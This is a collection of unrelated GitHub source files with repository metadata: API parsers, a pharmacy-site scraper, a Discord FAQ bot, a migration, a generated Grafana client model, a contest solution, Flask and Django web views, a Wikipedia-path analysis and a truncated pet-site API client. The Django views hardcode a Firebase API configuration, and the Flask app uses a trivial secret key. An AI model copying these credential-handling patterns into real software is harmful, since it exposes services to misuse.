+{"seq_id":"3429648666","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n- service_vault.parsers\n~~~~~~~~~~~~~~~~~~~~~~~\n\n- This file contains Custom Parsers to render Response to clients\n\"\"\"\n\n# future\nfrom __future__ import unicode_literals\n\n# 3rd party\n\n# rest-framework\nfrom rest_framework.parsers import BaseParser\n\n# Django\n\n# local\n\n# own app\n\n\nclass HTMLParser(BaseParser):\n \"\"\"HTML parser.\n\n \"\"\"\n media_type = 'text/html'\n\n def parse(self, stream, media_type=None, parser_context=None):\n \"\"\"\n Simply return a string representing the body of the request.\n \"\"\"\n return stream.read()\n\n\nclass PlainTextParser(BaseParser):\n \"\"\"\n Plain text parser.\n \"\"\"\n media_type = 'text/plain'\n\n def parse(self, stream, media_type=None, parser_context=None):\n \"\"\"\n Simply return a string representing the body of the request.\n \"\"\"\n return stream.read()\n","repo_name":"veris-neerajdhiman/v-serviceVault","sub_path":"service_vault/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37959642677","text":"import requests\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import datetime\nimport concurrent.futures\nimport time\nimport string\nimport pandas as pd\nimport logging as log\n\nheader = {'Origin': 'https://www.1mg.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'\n}\n\ndef clean_script(soup_obj):\n remove_tags = ['head','script','meta','style','blockquote']\n for x in soup_obj.findAll(remove_tags):\n x.decompose()\n return soup_obj\n\ndef call_scrapper(base_url,char):\n links = []\n index = 0\n while True:\n base_url_copy = base_url\n if index != 0 and char != 'a':\n base_url_copy += f'?page={index}&label={char}' \n elif index !=0 and char == 'a':\n base_url_copy += f'?page={index}'\n\n time.sleep(3)\n base_html = requests.get(url=base_url_copy,headers=header)\n\n # print(f\"Page: {index+1}\")\n if base_html.status_code == 200:\n base_bs_obj = soup(base_html.text,'html.parser')\n base_clean_obj = clean_script(base_bs_obj)\n temp = list() \n [temp.append(a['href']) for a in base_clean_obj.findAll('a',{'class':'button-text','target':'_blank'}) if 'drug' in a['href']]\n\n if temp:\n [links.append('https://www.1mg.com/drugs/'+x) for x in temp]\n else:\n print(\"----- No data available in page.... skipping to next search character -----\")\n break\n index += 1\n else:\n print(f\"---- Status code : {base_html.status_code} ----\")\n print(f\"\\n Error URL: {base_url}\")\n break\n return links\n\nif __name__ == \"__main__\":\n start = datetime.now()\n base_url = 'https://www.1mg.com/drugs-all-medicines'\n alpha = string.ascii_lowercase\n max_workers = 50\n\n response = list()\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n futures = {executor.submit(call_scrapper,base_url,char) for char in alpha}\n for future in concurrent.futures.as_completed(futures):\n response.append(future.result())\n \n final_links = list()\n if response:\n [[final_links.append(x) for x in lst] for lst in response if lst]\n \n df = pd.DataFrame({\"links\":final_links})\n df[\"links\"] = df[\"links\"].apply(lambda x:x.replace('https://www.1mg.com/drugs//','https://www.1mg.com/'))\n df.to_csv('data/med_card_links.csv',index=False)\n end = datetime.now()\n\n log.info(\" Time Taken: %s\",(end-start))","repo_name":"kaustavb79/1mg_drugs_scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26131255466","text":"from logging import getLogger\nfrom typing import Optional\n\nfrom discord import Interaction, SelectOption\nfrom discord.ui import Button, Select, View\nfrom mappings import mainoptions_mapping, suboption_mapping\nfrom topics import initial\n\nfrom classes.buttons import FSupportButton\nfrom classes.config import Config\n\nfrom .structure import CustomEmbed, Options # SubOptions\n\nlog = getLogger(__name__)\n\n\n# Defines the main dropdown select menu for the FAQ\nclass AlphaDropdown(Select):\n def __init__(self, custom_id: str = \"base_alphadropdown\") -> None:\n options = [\n SelectOption(\n label=article.label,\n description=article.description,\n emoji=article.emoji,\n value=str(article.id),\n )\n for article in initial.options\n ]\n options.append(\n SelectOption(\n label=\"I couldn't find what I'm looking for!\",\n value=Config().FURTHER_SUPPORT_ROLE,\n emoji=\"<:ICouldntFindWhatImLookingFor:995421072340037725>\",\n )\n )\n\n # The placeholder is what will be shown when no option is chosen\n # The min and max values indicate we can only pick one of the three options\n # The options parameter defines the dropdown options. We defined this above\n super().__init__(\n placeholder=\"Select a topic...\",\n min_values=1,\n max_values=1,\n options=options,\n custom_id=custom_id,\n )\n\n async def callback(self, interaction: Interaction) -> None:\n # Get the selected option and check if it's a request for further suppor, if it is send the confirmation and stop menu\n if self.values[0] == Config().FURTHER_SUPPORT_ROLE:\n await FSupportButton().callback(interaction)\n return\n\n # Figure out the corresponding article to their selection\n\n for key in mainoptions_mapping.keys():\n if float(self.values[0]) == key:\n menu = initial.options[int(key) - 1]\n\n embed = CustomEmbed(\n title=menu.label,\n description=f\"{menu.description}\\n\\n{menu.content}\",\n )\n\n # Figure out the sub-questions to display\n options_to_show = suboption_mapping.get(float(self.values[0]))\n\n # Adds each sub question to the select menu options\n next_options: list[SelectOption] = [\n SelectOption(\n label=question.label,\n emoji=question.emoji, # PartialEmoji.from_str() if question.emoji else None,\n )\n for question in options_to_show.options\n ]\n\n # Create a View object and generate the embed with the sub-questions\n view = View()\n view.add_item(BetaDropdown(options_to_show, next_options))\n\n for article in options_to_show.options:\n if float(self.values[0]) != initial.options[0].id:\n embed.add_field(\n name=article.label,\n value=article.description if article.description else \"\\u200b\",\n inline=False,\n )\n await interaction.response.send_message(embed=embed, view=view, ephemeral=True)\n\n\n# Defines the sub dropdown for the selected FAQ option\nclass BetaDropdown(Select):\n def __init__(\n self,\n sub_option: Optional[Options],\n options: list[SelectOption],\n ):\n self.sub_option = sub_option\n super().__init__(\n placeholder=\"Select a question...\",\n min_values=1,\n max_values=1,\n options=options,\n )\n\n async def callback(self, interaction: Interaction) -> None:\n embed = CustomEmbed(title=self.values[0])\n\n for question in self.sub_option.options:\n # Figure out which sub question was chosen and get the content (answer) of the question\n if question.label == self.values[0]: # .value\n embed.description = question.content\n\n if question.image:\n embed.set_image(url=question.image)\n\n view = View()\n if question.links:\n for link in question.links:\n view.add_item(\n Button(label=link.label, url=link.url, emoji=link.emoji)\n )\n view.add_item(FSupportButton())\n\n await interaction.response.send_message(embed=embed, ephemeral=True, view=view)\n","repo_name":"SnowyJaguar1034/ModMail-FAQ","sub_path":"classes/dropdowns.py","file_name":"dropdowns.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"74797573228","text":"\"\"\"follow table add/deletion\n\nRevision ID: 44f51f8b28a8\nRevises: 1d9caa4ab373\nCreate Date: 2021-12-23 14:22:10.075776\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '44f51f8b28a8'\ndown_revision = '1d9caa4ab373'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('follows',\n sa.Column('follower_id', sa.Integer(), nullable=False),\n sa.Column('following_id', sa.Integer(), nullable=False),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['following_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('follower_id', 'following_id')\n )\n op.drop_table('followers')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('followers',\n sa.Column('follower_id', sa.INTEGER(), nullable=True),\n sa.Column('followed_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )\n )\n op.drop_table('follows')\n # ### end Alembic commands ###\n","repo_name":"csulva/Card-Again","sub_path":"migrations/versions/44f51f8b28a8_follow_table_add_deletion.py","file_name":"44f51f8b28a8_follow_table_add_deletion.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"33746470616","text":"# coding: utf-8\n\n\"\"\"\n Grafana HTTP API.\n\n The Grafana backend exposes an HTTP API, the same API is used by the frontend to do everything from saving dashboards, creating users and updating data sources. # noqa: E501\n\n OpenAPI spec version: 0.0.1\n Contact: hello@grafana.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass OrgUserDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'access_control': 'dict(str, bool)',\n 'avatar_url': 'str',\n 'email': 'str',\n 'last_seen_at': 'datetime',\n 'last_seen_at_age': 'str',\n 'login': 'str',\n 'name': 'str',\n 'org_id': 'int',\n 'role': 'str',\n 'user_id': 'int'\n }\n\n attribute_map = {\n 'access_control': 'accessControl',\n 'avatar_url': 'avatarUrl',\n 'email': 'email',\n 'last_seen_at': 'lastSeenAt',\n 'last_seen_at_age': 'lastSeenAtAge',\n 'login': 'login',\n 'name': 'name',\n 'org_id': 'orgId',\n 'role': 'role',\n 'user_id': 'userId'\n }\n\n def __init__(self, access_control=None, avatar_url=None, email=None, last_seen_at=None, last_seen_at_age=None, login=None, name=None, org_id=None, role=None, user_id=None, _configuration=None): # noqa: E501\n \"\"\"OrgUserDTO - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._access_control = None\n self._avatar_url = None\n self._email = None\n self._last_seen_at = None\n self._last_seen_at_age = None\n self._login = None\n self._name = None\n self._org_id = None\n self._role = None\n self._user_id = None\n self.discriminator = None\n\n if access_control is not None:\n self.access_control = access_control\n if avatar_url is not None:\n self.avatar_url = avatar_url\n if email is not None:\n self.email = email\n if last_seen_at is not None:\n self.last_seen_at = last_seen_at\n if last_seen_at_age is not None:\n self.last_seen_at_age = last_seen_at_age\n if login is not None:\n self.login = login\n if name is not None:\n self.name = name\n if org_id is not None:\n self.org_id = org_id\n if role is not None:\n self.role = role\n if user_id is not None:\n self.user_id = user_id\n\n @property\n def access_control(self):\n \"\"\"Gets the access_control of this OrgUserDTO. # noqa: E501\n\n\n :return: The access_control of this OrgUserDTO. # noqa: E501\n :rtype: dict(str, bool)\n \"\"\"\n return self._access_control\n\n @access_control.setter\n def access_control(self, access_control):\n \"\"\"Sets the access_control of this OrgUserDTO.\n\n\n :param access_control: The access_control of this OrgUserDTO. # noqa: E501\n :type: dict(str, bool)\n \"\"\"\n\n self._access_control = access_control\n\n @property\n def avatar_url(self):\n \"\"\"Gets the avatar_url of this OrgUserDTO. # noqa: E501\n\n\n :return: The avatar_url of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._avatar_url\n\n @avatar_url.setter\n def avatar_url(self, avatar_url):\n \"\"\"Sets the avatar_url of this OrgUserDTO.\n\n\n :param avatar_url: The avatar_url of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._avatar_url = avatar_url\n\n @property\n def email(self):\n \"\"\"Gets the email of this OrgUserDTO. # noqa: E501\n\n\n :return: The email of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this OrgUserDTO.\n\n\n :param email: The email of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._email = email\n\n @property\n def last_seen_at(self):\n \"\"\"Gets the last_seen_at of this OrgUserDTO. # noqa: E501\n\n\n :return: The last_seen_at of this OrgUserDTO. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._last_seen_at\n\n @last_seen_at.setter\n def last_seen_at(self, last_seen_at):\n \"\"\"Sets the last_seen_at of this OrgUserDTO.\n\n\n :param last_seen_at: The last_seen_at of this OrgUserDTO. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._last_seen_at = last_seen_at\n\n @property\n def last_seen_at_age(self):\n \"\"\"Gets the last_seen_at_age of this OrgUserDTO. # noqa: E501\n\n\n :return: The last_seen_at_age of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._last_seen_at_age\n\n @last_seen_at_age.setter\n def last_seen_at_age(self, last_seen_at_age):\n \"\"\"Sets the last_seen_at_age of this OrgUserDTO.\n\n\n :param last_seen_at_age: The last_seen_at_age of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._last_seen_at_age = last_seen_at_age\n\n @property\n def login(self):\n \"\"\"Gets the login of this OrgUserDTO. # noqa: E501\n\n\n :return: The login of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._login\n\n @login.setter\n def login(self, login):\n \"\"\"Sets the login of this OrgUserDTO.\n\n\n :param login: The login of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._login = login\n\n @property\n def name(self):\n \"\"\"Gets the name of this OrgUserDTO. # noqa: E501\n\n\n :return: The name of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this OrgUserDTO.\n\n\n :param name: The name of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def org_id(self):\n \"\"\"Gets the org_id of this OrgUserDTO. # noqa: E501\n\n\n :return: The org_id of this OrgUserDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._org_id\n\n @org_id.setter\n def org_id(self, org_id):\n \"\"\"Sets the org_id of this OrgUserDTO.\n\n\n :param org_id: The org_id of this OrgUserDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._org_id = org_id\n\n @property\n def role(self):\n \"\"\"Gets the role of this OrgUserDTO. # noqa: E501\n\n\n :return: The role of this OrgUserDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._role\n\n @role.setter\n def role(self, role):\n \"\"\"Sets the role of this OrgUserDTO.\n\n\n :param role: The role of this OrgUserDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._role = role\n\n @property\n def user_id(self):\n \"\"\"Gets the user_id of this OrgUserDTO. # noqa: E501\n\n\n :return: The user_id of this OrgUserDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._user_id\n\n @user_id.setter\n def user_id(self, user_id):\n \"\"\"Sets the user_id of this OrgUserDTO.\n\n\n :param user_id: The user_id of this OrgUserDTO. # noqa: E501\n :type: int\n \"\"\"\n\n self._user_id = user_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(OrgUserDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, OrgUserDTO):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, OrgUserDTO):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"midokura/grafana-sync","sub_path":"swagger_client/models/org_user_dto.py","file_name":"org_user_dto.py","file_ext":"py","file_size_in_byte":9410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"9149003015","text":"import heapq\n\nN, M = map(int, input().split())\nAB = [list(map(int, input().split())) for _ in range(M)]\n\nE = [[] for _ in range(N)]\nIn = [0] * N\nfor a, b in AB:\n E[a - 1].append(b - 1)\n In[b - 1] += 1\n\nQue = [i for i, n in enumerate(In) if n == 0]\n\nheapq.heapify(Que)\nans = []\nwhile Que:\n p = heapq.heappop(Que)\n ans.append(p + 1)\n\n for v in E[p]:\n In[v] -= 1\n if In[v] == 0:\n heapq.heappush(Que, v)\n\nif len(ans) == N:\n print(*ans)\nelse:\n print(-1)\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc223/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31313572584","text":"import json\nimport click\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom datetime import timedelta\nfrom flask_migrate import Migrate\n\nfrom forms.auth import UserForm\nfrom libs.helpers import create_database_uri\nfrom model import User\nfrom model.base import db\n\n\napp = Flask(__name__)\napp.secret_key = \"secret key\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = create_database_uri()\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = timedelta(seconds=1)\ndb.init_app(app)\n\n\n@app.cli.command()\ndef initdb():\n db.create_all()\n click.echo(\"Initialized database.\")\n\n\nmigrate = Migrate(app, db)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n form = UserForm(request.form)\n if request.method == \"POST\" and form.validate():\n username = form.username.data\n password = form.password.data\n name = form.name.data\n id_card = form.id_card.data\n email = form.email.data\n phone = form.phone.data\n user = User(username=username, name=name, id_card=id_card, email=email, phone=phone)\n user.set_password(password)\n db.session.add(user)\n db.session.commit()\n return redirect(url_for(\".index\"))\n return render_template(\"index.html\", form=form)\n\n\n@app.route(\"/checkUser\", methods=[\"POST\"])\ndef check_username():\n if request.method == \"POST\":\n data = json.loads(request.get_data().decode('utf-8'))\n print(data.keys())\n print(User.__dict__[list(data.keys())[0]])\n print(data)\n if User.query.filter(User.__dict__[list(data.keys())[0]] == data[list(data.keys())[0]]).first():\n print(1)\n return json.dumps({\"code\": 1})\n print(2)\n return json.dumps({\"code\": 0})\n\n\n","repo_name":"redsnowc/FromValidator","sub_path":"demoAjax/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36824414259","text":"from django.shortcuts import render, redirect\nimport pyrebase\nfrom django.contrib import auth\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\n\nfrom.forms import *\nfrom mainapp.models import School, Room, Building, Topic, Course, Program, CourseSchedule\n\n# Create your views here.\nfrom mainapp.forms import StaffForm, StudentForm, ParentForm\nfrom mainapp.serializer import SchoolSerializer\n\nconfig = {\n 'apiKey': \"AIzaSyCrAG2_pI8A00gIAPBniRLqv7Kym2d97f0\",\n 'authDomain': \"fir-project-8cea6.firebaseapp.com\",\n 'databaseURL': \"https://fir-project-8cea6.firebaseio.com\",\n 'projectId': \"fir-project-8cea6\",\n 'storageBucket': \"fir-project-8cea6.appspot.com\",\n 'messagingSenderId': \"609798741798\"\n\n}\n\nfirebase = pyrebase.initialize_app(config)\n\nauthe = firebase.auth()\ndb = firebase.database()\nstorage = firebase.storage()\n# ids = list(db.child('Schools').shallow().get().val())\n# mykeys = list(db.child('Schools').child(ids[1]).get().val().keys())\n# allvalues = db.child('Schools').get().val()\n\n\n\n\nitems=['Schools','Rooms','Buildings','Topics', 'Courses', 'Programs', 'CourseSchedules','Questions']\n\n\ndef sign(request):\n return render(request, \"source/login.html\")\n\n\ndef postsign(request):\n email = request.POST.get(\"email\")\n passw = request.POST.get(\"pass\")\n try:\n user = authe.sign_in_with_email_and_password(email, passw)\n return render(request, \"source/admin.html\",{'items':items})\n except:\n message = \"Invalid Credentials\"\n print(message)\n return render(request, \"source/login.html\", {\"messg\": message})\n\n # print(user['idToken'])\n # session_id = user['idToken']\n # request.session['uid'] = str(session_id)\n\n\ndef allform(request, formtype,id=None):\n class AllForm(MyStyleForm):\n class Meta:\n model = getform(formtype)\n fields = ('__all__')\n # for editing forms\n if id:\n forminstance=db.child(formtype).child(id).get().val()\n form = AllForm(forminstance)\n # for adding new data into forms\n else:\n form=AllForm()\n\n if request.method == 'POST':\n form = AllForm(request.POST)\n # print(request.POST)\n xyz=dict(request.POST)\n print(xyz.keys())\n pqr=xyz['MyUser']\n request.POST._mutable = True\n r=request.POST\n\n\n del r['csrfmiddlewaretoken']\n del r['MyUser']\n\n mno=r\n print(mno)\n data={'user':pqr,'details':mno}\n\n if form.is_valid:\n # schoolid = r['csrfmiddlewaretoken']\n # del r['csrfmiddlewaretoken']\n # me=mark_safe(json.dumps(r))\n db.child(formtype).push(data)\n\n return redirect('/mainapp/home/')\n args = {'form': form, 'items':items}\n\n return render(request, 'allforms.html', args)\n\n\ndef home(request):\n # print(allvalues)\n myvalues=[]\n # print(mykeys)\n # print(allvalues)\n # for i in mykeys:\n # myvalues.append(allvalues[i])\n from django.utils.safestring import mark_safe\n import json\n x=mark_safe(json.dumps(allvalues))\n print(x)\n # print(myvalues)\n # serializer = SchoolSerializer(allvalues)\n # print(serializer)\n # return Response({'serializer': serializer, 'profile': profile})\n # genres = keys['city']\n # print(title)\n # print(genres)\n # for i in ids:\n # for j in keys:\n # bc=db.child('Schools').child(i).get().val()[j]\n # print(bc)\n # print(\"break\")\n testing={'hello':'hy','numb':45}\n\n return render(request, 'home.html',{'x':x,'ids':ids})\n\n\ndef userform(request, formtype):\n if formtype == 'staff':\n form = StaffForm()\n category = \"Staff\"\n elif formtype == 'student':\n form = StudentForm()\n category = \"Student\"\n elif formtype == 'parent':\n form = ParentForm()\n category = \"Parent\"\n\n if request.method =='POST':\n # print(request.POST)\n request.POST._mutable = True\n r = request.POST\n\n if form.is_valid:\n del r['csrfmiddlewaretoken']\n print(json.dumps(r))\n db.child(\"Users\").child(category).push(r)\n return redirect('abcyutjytg')\n\n args = {'form': form, 'items': items}\n\n return render(request, \"source/form.html\", args)\n\nfrom rest_framework.views import APIView\n\n\nclass ProfileDetail(APIView):\n renderer_classes = [TemplateHTMLRenderer]\n template_name = 'home.html'\n\n def get(self, requests,pk):\n ids = list(db.child('Schools').shallow().get().val())\n mykeys = list(db.child('Schools').child(ids[1]).get().val().keys())\n allvalues = db.child('Schools').child(ids[1]).get().val()\n serializer = SchoolSerializer(allvalues)\n return Response({'serializer': serializer})\n\n #\n # def post(self, request, pk):\n # profile = get_object_or_404(Profile, pk=pk)\n # serializer = ProfileSerializer(profile, data=request.data)\n # if not serializer.is_valid():\n # return Response({'serializer': serializer, 'profile': profile})\n # serializer.save()\n # return redirect('profile-list')\n\ndef test(request):\n allvalues = db.child('Schools').get().val()\n import json\n jsonobj=mark_safe(json.dumps(allvalues))\n return render(request,'test.html',{'jsonobj':jsonobj})\n # # print(allvalues)\n # print(mykeys)\n #\n # print(ids)\n # whole_data=[]\n # single_data=[]\n # for j in range(len(ids)):\n # datas = [ids[j]]\n # for i in range(len(mykeys)):\n # datas.append(db.child('Schools').child(ids[j]).get().val()[mykeys[i]])\n # whole_data.append(datas)\n # # whole_data.append(single_data)\n # print(datas)\n # print(single_data)\n # mykeys.insert(0, \"schoolid\")\n # # print(whole_data)\n # comb_list=zip(mykeys,whole_data)\n # print(comb_list)\n","repo_name":"surazaz/Social_network","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28505688874","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport csv\nimport networkx as nx\n\n\n# In[2]:\n\n\nwith open('paths_finished.tsv', newline='') as f:\n reader = csv.reader(f)\n pfread = list(reader)\nf.close()\n\npfread=pfread[16:]\n\n\n# In[ ]:\n\n\n\n\n\n# In[3]:\n\n\nwith open('article-ids.csv', newline='') as f:\n reader = csv.reader(f)\n article = list(reader)\nf.close()\n\n\n\n\n# In[4]:\n\n\nwith open('article-categories.csv', newline='') as f:\n reader = csv.reader(f)\n ac = list(reader)\nf.close()\n\n\n# In[5]:\n\n\na_map=dict()\nfor i in article:\n a_map[i[0]]=i[1]\n \n#print(a_map)\n\n\n# In[6]:\n\n\nc_map=dict()\n\nfor i in ac:\n c_map[i[0]]=i[1:]\n\n#print(c_map)\n\n\n# In[7]:\n\n\ndef modify(l):\n if '<' not in l:\n return l\n index=-1\n for i in range(0,len(l)):\n if l[i]=='<':\n index=i\n break\n \n temp1=l[:index-1]\n temp2=l[index+1:]\n l=temp1+temp2\n return modify(l)\n\n\nhp=dict()\nht=dict()\nsp=dict()\nst=dict()\n\nfor n in range(1,147):\n id=str(n)\n id=id.zfill(4)\n id='C'+id\n hp[id]=0\n ht[id]=0\n sp[id]=0\n st[id]=0\n\n\n\n\nfor line in pfread:\n line_arr=line[0].split('\\t')\n s=line_arr[-2]\n #if '<' in s:\n # continue\n \n #s=s.strip()\n #x=s.find('\\t')\n #s=s[:x]\n s_arr=s.split(';')\n #print(s_arr)\n cat_list=list()\n cat_set=set()\n s_arr=modify(s_arr)\n if len(s_arr)<=1:\n continue\n for art in s_arr:\n aid=a_map[art]\n cl=c_map[aid]\n for c in cl:\n cat_list.append(c)\n cat_set.add(c)\n \n for i in cat_list:\n hp[i]=hp[i]+1\n for i in cat_set:\n ht[i]=ht[i]+1\n \n \n#print(len(hp))\n#print(len(ht))\n#print(hp)\n#print(ht)\n\n\n# In[8]:\n\n\nwith open('edges.csv', newline='') as f:\n reader = csv.reader(f)\n edge_list= list(reader)\nf.close()\n\n\n# In[9]:\n\n\ns=set()\nisolated_nodes=set()\nfor i in edge_list:\n for j in i:\n s.add(j)\n\nfor c in range(1,4605):\n id=str(c)\n id=id.zfill(4)\n id='A'+id\n if id not in s:\n isolated_nodes.add(id)\n#print(isolated_nodes)\n\n \n\n\n# In[10]:\n\n\nG = nx.DiGraph()\nG.add_edges_from(edge_list)\n\n\n# In[11]:\n\n\n#p = nx.shortest_path(G, source='A0010', target='A0099')\n#print(p)\n\n\n# In[12]:\n\n\n\n\n\nfor line in pfread:\n line_arr=line[0].split('\\t')\n s=line_arr[-2]\n #if '<' in s:\n # continue\n \n #s=s.strip()\n #x=s.find('\\t')\n #s=s[:x]\n s_arr=s.split(';')\n s_arr=modify(s_arr)\n if len(s_arr)<=1:\n continue\n #print(s_arr)\n cat_list=list()\n cat_set=set()\n sa=list()\n for a in s_arr:\n aid=a_map[a]\n sa.append(aid)\n #print(sa) \n if sa[0] in isolated_nodes:\n continue\n if sa[-1] in isolated_nodes:\n continue\n shortest_path=nx.shortest_path(G, source=sa[0], target=sa[-1])\n \n #print(shortest_path)\n for aid in shortest_path:\n cl=c_map[aid]\n for c in cl:\n cat_list.append(c)\n cat_set.add(c)\n \n for i in cat_list:\n sp[i]=sp[i]+1\n for i in cat_set:\n st[i]=st[i]+1\n \n#print(len(sp))\n#print(len(st))\n#print(sp)\n#print(st)\n \n\n\n# In[13]:\n\n\n\nresult=list()\n\n\nfor k in hp:\n e=[k,ht[k],hp[k],st[k],sp[k]]\n result.append(e)\n \n\n\n# In[14]:\n\n\nfile = open('category-paths.csv', 'w+', newline ='') \nwith file: \n write = csv.writer(file) \n write.writerows(result) \nfile.close()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"debanjanchatterjee/CS685-data-mining","sub_path":"Assignment 2/category-paths-generator.py","file_name":"category-paths-generator.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11266944930","text":"import requests\nimport json\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\n\nclass PetFriends:\n def __init__(self):\n self.base_url = \"https://petfriends1.herokuapp.com/\"\n\n def get_api_key(self, email, password):\n \"\"\"Метод делает запрос к API сервера и возвращает статус запроса и результат\"\"\"\n headers = {\n 'email': email,\n 'password': password\n }\n res = requests.get(self.base_url+'api/key', headers=headers)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def get_list_of_pets(self, auth_key, filter):\n \"\"\"Метод делает запрос к API сервера и возвращает статус запроса со списком наденных питомцев\"\"\"\n headers = {'auth_key': auth_key['key']}\n filter = {'filter': filter}\n\n res = requests.get(self.base_url + 'api/pets', headers=headers, params=filter)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n return status, result\n\n def add_new_pet(self, auth_key, name: str, animal_type: str,\n age: str, pet_photo: str):\n \"\"\"Метод добавляет нового питомца\"\"\"\n data = MultipartEncoder(\n fields={\n 'name': name,\n 'animal_type': animal_type,\n 'age': age,\n 'pet_photo': (pet_photo, open(pet_photo, 'rb'), 'image/jpeg')\n })\n headers = {'auth_key': auth_key['key'], 'Content-Type': data.content_type}\n\n res = requests.post(self.base_url + 'api/pets', headers=headers, data=data)\n status = res.status_code\n result = \"\"\n try:\n result = res.json()\n except:\n result = res.text\n 